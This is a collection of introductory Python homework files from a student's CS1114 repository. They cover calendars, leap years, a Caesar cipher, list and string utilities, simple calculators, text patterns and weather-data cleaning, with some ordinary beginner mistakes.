"text": "'''\r\nM Touhid Chowdhury\r\nmtc405\r\n\r\nfunction to print monthly calander and return what day the next month would begin\r\nfunction to check leap year\r\nfunction to build a year calendar\r\n\r\n\r\n'''\r\n\r\ndef monthly_calendar(daysInMonth,startingDay):\r\n '''this function takes in parameter for number of days in month and\r\n day of the week that represents when calendar begins and prints that month'''\r\n \r\n print(\"Mo\\tTu\\tWe\\tTh\\tFr\\tSa\\tSu\\t\")\r\n\r\n for number in range(startingDay-1):\r\n print (\"\\t\", end = \"\")\r\n\r\n initial = 1\r\n while initial <= daysInMonth:\r\n print (\" \", initial,end = \"\\t\" )\r\n if (initial + startingDay - 1) % 7 == 0:\r\n print (\"\\n\")\r\n initial += 1\r\n\r\n nextDay = ((daysInMonth-1+startingDay)%7+1)\r\n print('\\n')\r\n print(\"next day of the month would begin\", nextDay)\r\n return nextDay\r\n\r\nnextDay = monthly_calendar(31,4)\r\nprint('\\n')\r\n\r\n#input \r\ndef check_if_leap_year(year):\r\n \r\n leap = False\r\n if year % 4 == 0 and year % 100 != 0:\r\n leap = True\r\n if year % 100 ==0 and year % 400 == 0:\r\n leap = True\r\n return leap\r\nuserYear= int(input(\"Please enter a year to check if its leap year or not\"))\r\nleap = check_if_leap_year(userYear)\r\nprint(leap)\r\n\r\ndef yearly_calendar(year,startingDay):\r\n checking = check_if_leap_year(year)\r\n if checking == True:\r\n print(\"\\t\\t\\tJANUARY\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay= ((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tFEBUARY\", year)\r\n monthly_calendar(29,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+28)%7+1)\r\n print(\"\\t\\t\\tMARCH\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tAPRIL\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tMAY\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tJune\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tJuly\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tAugust\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tSeptember\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tOctober\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tNovember\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tDecember\", year)\r\n monthly_calendar(31,startingDay)\r\n elif checking == False:\r\n print(\"\\t\\t\\tJanuary\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay= ((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tFebruary\", year)\r\n monthly_calendar(28,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+27)%7+1)\r\n print(\"\\t\\t\\tMarch\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tApril\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tMay\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tJune\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tJuly\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tAugust\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tSeptember\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tOctober\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tNovember\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tDecember\", year)\r\n monthly_calendar(31,startingDay)\r\n \r\ndef main():\r\n userYear = int(input(\"Please enter a year: \"))\r\n userBegin = int(input(\"Please enter the day to begin year (e.g: 1 for Monday, 2 for Tuesday): \"))\r\n yearly_calendar(userYear,userBegin)\r\nmain()\r\n \r\n \r\n\r\n"
},
{
"alpha_fraction": 0.595478892326355,
"alphanum_fraction": 0.6162998080253601,
"avg_line_length": 33.02083206176758,
"blob_id": "00acae8471a24e13cd970876bd6abe89ec1760ea",
"content_id": "9a1966ba8646d7932f11ad7acf39aec326855663",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1681,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 48,
"path": "/Homework 7/Caesar_cipher_for_letters_sample_code_Frankl.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "##plain_text = input(\"Enter the plaintext (a positive integer) \" )\r\n##shift = int(input(\"Enter an integer between 0 and 9 \" ))\r\n##cipher_text = \"\"\r\n##for cur_char in plain_text:\r\n## cur_cipher = int(cur_char) + shift\r\n## print (cur_cipher)\r\n## if cur_cipher >= 10 :\r\n## cur_cipher = cur_cipher - 10\r\n## #cur_cipher is now between 0 and 9, inclusive\r\n## cipher_text = cipher_text + str(cur_cipher)\r\n##print(cipher_text)\r\n##\r\n###VERSION 2\r\n##print(\"version 2: \")\r\n##cipher_text = \"\"\r\n##for cur_char in plain_text:\r\n## cur_cipher = (int(cur_char) + shift) % 10\r\n## print (cur_cipher)\r\n## cipher_text = cipher_text + str(cur_cipher)\r\n##print(cipher_text)\r\n\r\nprint(\"version 3\")\r\nplain_text = input(\"Enter the plaintext (a string of capital letters): \" )\r\nshift = int(input(\"Enter an integer between 0 and 25: \" ))\r\ncipher_text = \"\"\r\nfor cur_char in plain_text:\r\n cur_cipher = ord(cur_char) + shift\r\n print (cur_cipher)\r\n if cur_cipher >= 91 : # shifted past 'Z'\r\n cur_cipher = cur_cipher - 26 # \"wrap around\"\r\n #cur_cipher is now between ord('A') and ord('Z'), inclusive\r\n cipher_text = cipher_text + chr(cur_cipher)\r\nprint(cipher_text)\r\n\r\n\r\n#VERSION 4\r\nprint(\"version 4: \")\r\ncipher_text = \"\"\r\nfor cur_char in plain_text:\r\n #cur_cipher = (int(cur_char) + shift) % 10\r\n shifted = ord(cur_char) - 65 + shift #between shift and 25 + shift\r\n shifted_wrapped = shifted % 26 #between0 and 25\r\n regular_encoding = shifted_wrapped + 65\r\n cur_cipher = chr(regular_encoding)\r\n print (cur_cipher)\r\n #cipher_text = cipher_text + str(cur_cipher)\r\n cipher_text = cipher_text + cur_cipher\r\nprint(cipher_text)\r\n"
},
{
"alpha_fraction": 0.5069444179534912,
"alphanum_fraction": 0.5400883555412292,
"avg_line_length": 24.049999237060547,
"blob_id": "6f9af70bd2a09bbef561dca76f1d96ec5031d870",
"content_id": "6db5ab309f1502fad955412fa5c2a13d0de9b8ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3184,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 120,
"path": "/Homework 9/hw9.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\nCS-UY 1114\r\nProfessor Frankl\r\nM Touhid Chowdhury\r\nmtc405 N14108583\r\nhw 9\r\nfunction to give the maximum absolute value, function to find all indexes of given value,\r\nfunction that reverses string, another function that reverses in place, function that encodes a string,\r\nfunction that decodes the string\r\n'''\r\n\r\ndef max_abs_val(lst):\r\n index = 0\r\n lengthOfLst= len(lst)\r\n while index < lengthOfLst:\r\n if lst[index] < 0:\r\n newNumber = lst[index] * -1\r\n lst.pop(index)\r\n lst.insert(index,newNumber)\r\n index += 1\r\n firstNumber = lst[0]\r\n for numbers in lst:\r\n if numbers > firstNumber:\r\n firstNumber = numbers\r\n return firstNumber \r\n\r\ndef main_q1():\r\n print(\"Q1\")\r\n print(\" Sample execution using [-19, -3, 20, -1, 0, -25] : \")\r\n lst = [-19, -3, 20, -1, 0, -25]\r\n maximum = max_abs_val(lst)\r\n print(maximum)\r\nmain_q1()\r\n\r\ndef find_all(lst, val):\r\n index = 0\r\n newList = []\r\n for number in lst:\r\n if number == val:\r\n newList.append(index)\r\n index +=1\r\n return newList\r\n\r\ndef main_q2():\r\n print(\"Q2\")\r\n print(\"Sample execution using [‘a’, ‘b’, 10, ‘bb’, ‘a’] and 'a'\")\r\n lst = ['a', 'b', 10, 'bb', 'a']\r\n value = 'a'\r\n newList = find_all(lst, value)\r\n print(newList)\r\nmain_q2()\r\n\r\n\r\ndef reverse1 (lst):\r\n newList =[]\r\n endingIndex = len(lst)-1 \r\n while endingIndex >= 0:\r\n newList.append(lst[endingIndex])\r\n endingIndex -= 1 \r\n return newList \r\n\r\ndef reverse2 (lst):\r\n indexs= len(lst)-1\r\n index= 0 \r\n while indexs > index:\r\n lst.append(lst[indexs-1])\r\n lst.pop(indexs-1)\r\n indexs -= 1\r\n return lst \r\n\r\ndef main_q3():\r\n print(\"Q3\")\r\n lst1 = [1, 2, 3, 4, 5, 6]\r\n rev_lst1 = reverse1(lst1)\r\n print(\"After reverse1, lst1 is \", lst1, \" and the returned list is \", rev_lst1)\r\n lst2 = [1, 2, 3, 4, 5, 6]\r\n reverse2(lst2)\r\n print(\"After reverse2, lst2 is \", lst2)\r\n\r\nmain_q3()\r\n\r\n\r\ndef encoder(string):\r\n encodedList = []\r\n counter = 1\r\n length = len(string)\r\n for index in range(0,length):\r\n if index < (length-1): \r\n if string[index] == string[index+1]: \r\n counter+= 1\r\n elif string[index] != string[index+1]:\r\n encodedList.append([string[index],counter]) \r\n counter = 1 \r\n elif index == (length-1): \r\n if string[index] == string[index-1]: \r\n counter += 1\r\n encodedList.append([string[index],counter-1]) \r\n else:\r\n encodedList.append([string[index],counter])\r\n counter = 1\r\n return encodedList\r\n\r\n \r\ndef decode(lst):\r\n string = \"\"\r\n for character, numberOfCharacters in lst:\r\n string += character * numberOfCharacters\r\n return string\r\n \r\ndef main_q4():\r\n print(\"Q4\")\r\n print(\" String is 'aadccccaa' decoding will give: \")\r\n string= 'aadccccaa'\r\n encoded = encoder(string)\r\n print(encoded)\r\n print(\"Encoded to string is: \")\r\n backToString = decode(encoded)\r\n print(backToString)\r\n\r\nmain_q4()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.7099697589874268,
"alphanum_fraction": 0.7160120606422424,
"avg_line_length": 39.25,
"blob_id": "56f13f64677e95f9a0790e48e12eb402613de7c8",
"content_id": "650e48c6dbd03cf4f2b7e0ded329f308a17b7fd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 331,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 8,
"path": "/Homework 2/hw2q1a.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#calculate the BMI of person by taking their weight and height\r\n\r\nweight = float(input(\"please enter weight in kilograms:\")) #user weight input\r\nheight = float(input(\"please enter height in meters:\"))# user height input\r\n\r\nBMI = weight / (height**2) #using the BMI formula \r\n\r\nprint (\"BMI is\", round(BMI,7))#printing the results \r\n"
},
{
"alpha_fraction": 0.7084444165229797,
"alphanum_fraction": 0.7173333168029785,
"avg_line_length": 35.16666793823242,
"blob_id": "e5956e976033dbc9c98dc97f5d19fb85c172eb32",
"content_id": "65dde6f781b2b81d829f25ba931305da9e47ab3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1125,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 30,
"path": "/Homework 2/hw2q4.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#adding johns and bills worked time together \r\n\r\n#getting John's data\r\ndaysJohn = int(input(\"Please enter the number of days John worked:\"))\r\nhoursJohn = int(input(\"please enter the number of hours John worked\"))\r\nminutesJohn = int(input(\"please enter the number of minutes John worked\"))\r\n\r\n#getting bills data\r\ndaysBill = int(input(\"Please enter the number of days Bill worked:\"))\r\nhoursBill = int(input(\"please enter the number of hours Bill worked\"))\r\nminutesBill = int(input(\"please enter the number of minutes Bill worked\"))\r\n\r\n#adding Johns and Bills data\r\ndaysTotal = daysJohn + daysBill\r\nhoursTotal = hoursJohn + hoursBill \r\nminutesTotal = minutesJohn + minutesBill\r\n\r\n#running a loop on the hours to convert them to days \r\nwhile hoursTotal >= 24:\r\n daysTotal = daysTotal + 1\r\n hoursTotal = hoursTotal - 24\r\n#running a loop on minutes to convert them to hours \r\nwhile minutesTotal >= 60:\r\n hoursTotal = hoursTotal + 1\r\n minutesTotal = minutesTotal - 60\r\n\r\n\r\n#printing the data \r\nprint(\"John and Bill worked in total\", daysTotal,\"days\", hoursTotal,\"hours and \",\\\r\n minutesTotal,\"minutes\")\r\n \r\n\r\n\r\n"
},
{
"alpha_fraction": 0.7272727489471436,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 33.75,
"blob_id": "b874bd522ef3dd42cdb0a6601c58a0edc34c0b29",
"content_id": "53e3550ae65238c3f0141d579bc5fe54c1c8147c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 4,
"path": "/Homework 2/hw2q5.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "import datetime\r\n\r\ntoday = datetime.date.today() #using module to get today's date\r\nprint (\"The date today is:\", today)#printing today's date\r\n"
},
{
"alpha_fraction": 0.6897590160369873,
"alphanum_fraction": 0.6897590160369873,
"avg_line_length": 27.636363983154297,
"blob_id": "eda818033e3e7022ed30294e79db4b2c3d3e0b1a",
"content_id": "40b717ae0d4d306fcbbe65f97ce9abb455a2e2f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 332,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/Homework 5/hw5q6.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#obtaining user string\r\nuserString = input(\"Please enter line of text: \")\r\n#obtaining letter to remove \r\ncharacter = input(\"Please enter a character you want to remove: \")\r\n#new string initialized\r\nstring =\"\"\r\nfor letter in userString:\r\n if letter != character:\r\n string += letter\r\n#print new string\r\nprint(string)\r\n \r\n"
},
{
"alpha_fraction": 0.7191392779350281,
"alphanum_fraction": 0.7485843896865845,
"avg_line_length": 29.535715103149414,
"blob_id": "08ddabdadb6079ebf00601349323b97498e026cc",
"content_id": "af215e3a704d7d47637cfe789d671c7fdb13ecf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 883,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 28,
"path": "/Homework 1/q4.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#this program takes years in integers and prints out estimated population\r\n\r\nimport math\r\n\r\n#constants \r\ncurrentPopulation = 307357870\r\ndaysInYear = 365\r\nHourInDay = 24\r\nsecondsInHour = 3600\r\n#getting user input of number of years \r\nuserInputYear = int(input(\"please enter the number of years: \"))\r\n\r\n#telling the user to wait while the program calculates\r\nprint(\"Please wait while we calculate....\")\r\n\r\n#converting user input to seconds \r\nseconds = userInputYear * daysInYear * HourInDay * secondsInHour\r\n\r\n#getting the change of rate of each difference \r\nbirthRate = seconds * (1/7)\r\ndeathRate = seconds * (1/13)\r\nimmigrantRate = seconds * (1/35)\r\n\r\n#adding the changes to current population to get the new population \r\npopulation = currentPopulation + birthRate + immigrantRate - deathRate\r\n\r\n#print new population \r\nprint(\" The estimated population growth is\", int(population))\r\n"
},
{
"alpha_fraction": 0.701298713684082,
"alphanum_fraction": 0.7229437232017517,
"avg_line_length": 43,
"blob_id": "abdd5518cd50e04e27e1fac523a75e37730b64e8",
"content_id": "85e0bd5238ac4273bb0b37dc12fd223fc2be0e9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 5,
"path": "/Homework 1/q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#question 3\r\n#program that asks for the user’s name and prints a personalized welcome message\r\n\r\nuserName = input(\"Please enter your name: \") #asking for name\r\nprint(\"Hello\",userName,\"Welcome to CS-UY 1114.\") #print message\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6425073742866516,
"alphanum_fraction": 0.654260516166687,
"avg_line_length": 21.744186401367188,
"blob_id": "90ad86af3e20132f5b9f865886528cc09a57f757",
"content_id": "9b7b74d82b3df94c560021fb803d44af6de5960c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1021,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 43,
"path": "/Homework 8/hw8q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\nM Touhid Chowdhury\r\nmtc405\r\nfunction that returns the first word in a phrase\r\nfunction that removes first word and gives remaining\r\nfunction that reverses the phrase\r\nmain() interacts with user\r\n'''\r\n\r\n\r\ndef returnFirstWord(phrase):\r\n indexOfFirstWord = phrase.find(' ')\r\n if indexOfFirstWord == -1:\r\n firstWord = phrase\r\n else:\r\n firstWord = phrase[:indexOfFirstWord]\r\n return firstWord\r\n\r\n\r\ndef removeFirstWord(phrase):\r\n indexOfFirstWord = phrase.find(' ')\r\n newPhrase = phrase[indexOfFirstWord+1:]\r\n return newPhrase\r\n\r\n\r\ndef reversePhrase(phrase):\r\n wordsInPhrase= phrase.count(' ')+1\r\n reversed1= \"\"\r\n count = 1\r\n while count <= wordsInPhrase:\r\n reversed1 =returnFirstWord(phrase) + ' '+ reversed1\r\n phrase = removeFirstWord(phrase)\r\n count += 1\r\n return reversed1\r\n\r\n\r\ndef driverMain():\r\n userPhrase = input(\"Please enter a phrase to reverse\")\r\n newLine = reversePhrase(userPhrase)\r\n print(newLine)\r\n return newLine\r\n \r\ndriverMain()\r\n"
},
{
"alpha_fraction": 0.6315120458602905,
"alphanum_fraction": 0.6454892158508301,
"avg_line_length": 50.06666564941406,
"blob_id": "8e3aeedca99b9abff8282876fbf5b655c1f10a76",
"content_id": "cdee46b5ac0e5e26d9949334b544ec3e9eef99b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 787,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 15,
"path": "/Homework 3/hw3q4.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#homework 3 question 4\r\n\r\n#getting the input of the sides \r\na = float(input(\"Length of first side: \"))\r\nb = float(input(\"Length of second side: \"))\r\nc = float(input(\"Length of third side: \"))\r\n\r\nif a == b and b == c and a ==c :# if all sides equal equalateral triangle\r\n print(\"This is a equilateral triangle\")\r\nelif a == b or a == c or b == c:# if two sides equal isosceles triangle\r\n print(\"this is a isoseles triangle\")\r\nelif (a == b or a == c or b == c) and (a**2 + b**2 == c**2 or a**2 + c**2 == b**2 or c**2 + b**2 == a**2):\r\n print(\"this is an isosceles right triangle \")#if two sides equal and pythagorean formula fits its isosceles right triangle\r\nelse:#if none of the conditions apply its neither \r\n print(\"neither equalateral nor isosceles right triangle\")\r\n \r\n"
},
{
"alpha_fraction": 0.6138691902160645,
"alphanum_fraction": 0.6390858888626099,
"avg_line_length": 41.75862121582031,
"blob_id": "c32f641f653478d25932944d0ff4258a0025e399",
"content_id": "f984cd9e30aeef3c55123c89c7c86c270d097864",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1269,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 29,
"path": "/Homework 3/hw3q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "import math #importing a module\r\n\r\n#getting users input\r\na = float(input(\"Please enter a value for a: \"))\r\nb = float(input(\"Please enter a value for b: \"))\r\nc = float(input(\"Please enter a value for c: \"))\r\n\r\n#calculating discrimant to see how many solutions\r\ndiscrimant = b**2 - (4 * a * c )\r\n\r\nif a == 0 and b == 0 and c == 0:\r\n print(\"this equation has infinite number of solutions.\")#infinite\r\nelif a == 0 and b == 0 and c != 0:\r\n print(\"this equation has no solutions.\")#no solution\r\nelif discrimant < 0:\r\n print(\"There is no real solutions\")#if discrimant negative no solution\r\n\r\nelif a!=0 and discrimant == 0:\r\n solution = (-b + math.sqrt(discrimant)) / (2 * a)\r\n print (\"This equation has one solutions: \", solution)#if discrimant equals 0 one solution\r\nelif a != 0 and discrimant > 0:\r\n solution1 = (-b + math.sqrt(discrimant)) / (2 * a)#solution1 1 \r\n solution2 = (-b - math.sqrt(discrimant)) / (2 * a)#solution 2 \r\n print(\"This equation has two solutions: x = \", solution1, \"and x = \", solution2)#discrimant greater than 0\r\nelif a ==0 and b!= 0 and c != 0:#linear\r\n solut = -c/b\r\n print(' the equation has single solution x =', solut)\r\nelif a == 0 and b!=0 and c ==0:\r\n print(\"this equation has single real solution x =0\")\r\n"
},
{
"alpha_fraction": 0.5780590772628784,
"alphanum_fraction": 0.6139240264892578,
"avg_line_length": 31.571428298950195,
"blob_id": "060405e20d3c55ca946155d6f608e8775ba17c0e",
"content_id": "9a8d59cdeb6287399685d9ef198513e7a615cd45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 14,
"path": "/Homework 5/hw5q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#getting user input\r\nn = int(input(\"Please enter a positive integer: \"))\r\n#spaces\r\npattern1 =' '\r\n#stars \r\npattern2 ='*'\r\n#top triangle prints n lines to form the triangle \r\nfor number in range(0,n):\r\n line1 = pattern1*(number) + pattern2* ((n - number) * 2-1 ) \r\n print(line1)\r\n#bottom triangle prints n lines to form the triangle \r\nfor number in range(0,n):\r\n line2 = pattern1 * (n- 1 - number) + pattern2*((number*2) + 1)\r\n print(line2)\r\n\r\n"
},
{
"alpha_fraction": 0.6913123726844788,
"alphanum_fraction": 0.6931608319282532,
"avg_line_length": 29.823530197143555,
"blob_id": "0ca40eace80fe0a43b1d51ba51f8eac08155a73a",
"content_id": "e885213b7c9fb0afbbb9c0446e6226cb6cd14b85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1082,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 34,
"path": "/Homework 4/hw4q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#a\r\n#getting character from user\r\nuserCharacter = input(\"Please enter a character: \")\r\n\r\n#checking whether it is upper, lower, numeric or else \r\nif userCharacter.isupper()== True:\r\n print(userCharacter,\" is upper case letter.\")\r\nelif userCharacter.islower()== True:\r\n print(userCharacter,\" is lower case letter.\")\r\nelif userCharacter.isdigit()== True:\r\n print(userCharacter,\" is a digit.\")\r\nelse:\r\n print(userCharacter,\" is a non alphanumeric character.\")\r\n\r\n\r\n#b\r\n\r\n#without using string methods \r\n\r\n#getting character from user\r\nuserSecondCharacter = input(\"Please enter another character: \")\r\nAsciiValue = ord(userSecondCharacter)\r\n\r\n#comparing ascii values of the character to its specific grouping\r\n\r\n#printing the type \r\nif AsciiValue >= ord('a') and AsciiValue <= ord('z'):\r\n print(\"This is a lowercase letter.\")\r\nelif AsciiValue >= ord('A') and AsciiValue <= ord('Z'):\r\n print(\"This is a uppercase letter.\")\r\nelif AsciiValue >= ord('0') and AsciiValue <= ord('9'):\r\n print(\"This is a digit.\")\r\nelse:\r\n print(\"This is a non alphanumeric character.\")\r\n"
},
{
"alpha_fraction": 0.5927594900131226,
"alphanum_fraction": 0.6145121455192566,
"avg_line_length": 36.77108383178711,
"blob_id": "3f73f9b5c399f697fca37a7d62f21fcb01aef3d7",
"content_id": "8df9c6c7c94cd903d1ef0df1d4238b36317a8674",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6436,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 166,
"path": "/Homework 11/hw11.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\n\r\nM. Touhid Chowdhury\r\nCS 1114\r\nmtc405\r\nN14108583\r\n\r\nNote: Used updated windows file\r\nFirst function cleans the data and makes new file with just city, date, high temp, low temp, and precipitation\r\nSecond Function converts farenheit to celsius\r\nthird function converts inch to centimeter\r\nfourth function uses the last two function to convert the cleaned data into metric units\r\nthe last function takes the metric file and a year and prints the average of the highests and the lowests \r\n'''\r\n\r\n\r\n# Part A\r\ndef clean_data(complete_weather_filename, cleaned_weather_filename):\r\n weather = open(complete_weather_filename, \"r\")\r\n cleaned = open(cleaned_weather_filename, \"w\")\r\n headers_line = weather.readline()#remove header line\r\n\r\n print(\"City\", \"Date\",\"High Temp\", \"Low Temp\", \"precipitation\", sep = \",\",file = cleaned) #new header\r\n #loop through file and print into new file only desired information\r\n #convert any alpha into 0 \r\n for curr_line in weather:\r\n curr_line = curr_line.strip()\r\n curr_list = curr_line.split(',')\r\n city = curr_list[0]\r\n date = curr_list[1]\r\n highTemp = curr_list[2]\r\n lowTemp = curr_list[3]\r\n precip = curr_list[8]\r\n if highTemp.isalpha():\r\n highTemp = 0\r\n if lowTemp.isalpha():\r\n lowTemp = 0\r\n if precip.isalpha():\r\n precip = 0 \r\n \r\n print(city, date, highTemp, lowTemp, precip, sep = \",\", file = cleaned)\r\n #close files after completing \r\n cleaned.close()\r\n weather.close()\r\n print('done')\r\n \r\n\r\n\r\n# Part B\r\ndef f_to_c(f_temperature):\r\n #convert farenheit to celsius\r\n celsius = (float(f_temperature)-32)*(5/9)\r\n return celsius\r\n\r\ndef in_to_cm(inches):\r\n #convert inches to centimeter\r\n centimeter = float(inches) * 2.54\r\n return centimeter\r\n\r\ndef convert_data_to_metric(imperial_weather_filename, metric_weather_filename):\r\n #convert all data to metric\r\n imperial = open(imperial_weather_filename, \"r\")\r\n metric = open(metric_weather_filename, \"w\")\r\n headline = imperial.readline()\r\n print(\"city\", \"date\",\"highTemp\", \"lowTemp\", \"precipitation\", sep = \",\", file = metric)\r\n for curr_line in imperial:\r\n curr_line = curr_line.strip()\r\n curr_list = curr_line.split(',')\r\n city = curr_list[0]\r\n date = curr_list[1]\r\n highTemp = f_to_c(curr_list[2])\r\n lowTemp = f_to_c(curr_list[3])\r\n precip = in_to_cm(curr_list[4])\r\n print(city, date, highTemp, lowTemp, precip, sep = \",\", file = metric)\r\n\r\n metric.close()\r\n imperial.close()\r\n print(\"done\")\r\n\r\n#Part C\r\ndef print_average_temps_per_month(city, weather_filename, unit_type):\r\n# prints average highs and lows in each month for the given city\r\n file = open(weather_filename, 'r')\r\n headline = file.readline()\r\n counterMonths= [0,0,0,0,0,0,0,0,0,0,0,0] #keep track of how many times each month occur\r\n valuesForHigh = [0,0,0,0,0,0,0,0,0,0,0,0]# keeps track of the highs of every month\r\n valuesForLow =[0,0,0,0,0,0,0,0,0,0,0,0] #keep track of the lows of every month \r\n countMetric = 0\r\n countImperial = 0 \r\n print(\"Average temperatures for \", city, \":\")\r\n for curr_line in file:\r\n curr_line.strip()\r\n curr_list = curr_line.split(',')\r\n cityFile = curr_list[0]\r\n date = curr_list[1]\r\n highTemp = curr_list[2]\r\n lowTemp = curr_list[3]\r\n monthDayYearList = date.split('/')\r\n if cityFile == city:\r\n for number in range(0,13):\r\n if monthDayYearList[0] == str(number):\r\n valuesForHigh [number-1] += float(highTemp)\r\n valuesForLow[number-1] += float(lowTemp)\r\n counterMonths[number-1] += 1\r\n #list of months to print\r\n month =[\"January\", \"February\", \"March\", \"April\",\"May\", \"June\", \"July\",\"August\",\"September\", \"October\", \"November\", \"December\"]\r\n if unit_type == \"imperial\":\r\n for appearance in counterMonths:\r\n print(month[countMetric],\":\",round(valuesForHigh[countMetric]/appearance,3),\"F High\",round(valuesForLow[countMetric]/appearance,3), \"F low\") \r\n countMetric +=1 \r\n if unit_type == \"metric\":\r\n for appearance in counterMonths:\r\n print(month[countImperial],\":\",round(valuesForHigh[countImperial]/appearance,3),\"C High\",round(valuesForLow[countImperial]/appearance,3), \"C low\") \r\n countImperial +=1\r\n file.close()\r\n 